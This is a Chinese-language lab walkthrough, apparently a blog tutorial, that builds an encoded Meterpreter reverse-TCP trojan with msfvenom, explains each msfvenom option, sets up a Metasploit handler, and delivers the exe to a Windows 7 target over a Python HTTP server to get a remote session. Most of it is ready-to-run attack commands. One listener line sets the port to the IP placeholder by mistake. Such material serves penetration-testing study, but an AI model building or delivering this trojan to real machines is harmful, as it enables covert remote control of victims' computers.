环境:
攻击机:kali 2020.1b
靶机:win7 32位
1.利用metasploit生成一个木马。
利用msfvenom生成一个简单的windows木马
命令:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=listen_ip LPORT=listen_port -b"\x00" -e x86/shikata_ga_nai -f exe > msf.exe
mvfvenom命令行选项
Option:
-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
--platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: '\x00\xff'
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out <path> 保存payload
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项
--help-formats 查看msf支持的输出格式列表
所以上面生成木马的命令意思是:生成一个windows 32位经过编码的木马,监听IP和端口为你msf监听的IP和端口,且过滤了\x00
运行该命令,是用ls查看文件,msf.exe已经生成
2.开启msf监听
msf> use exploit/multi/handler
使用handler模块
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
设置监听payload,和生成木马的payload一样
msf exploit(handler)> set lhost listen_ip
设置监听IP
msf exploit(handler)> set lport listen_ip
设置监听端口
msf exploit(handler)>show options
查看配置信息,也可以使用info进行查看该模块的详细信息
msf exploit(handler)>exploit
执行该模块
3.传递木马
在kali里面使用python简单开启一个http server
root@kali:~# python -m SimpleHTTPServer 888
win7靶机访问kali 888端口进行下载msf.exe程序,并运行
kali接收到一个session
使用 sessions 查看,此时已经获取到一个低权限的session,下一阶段进行权限的提升。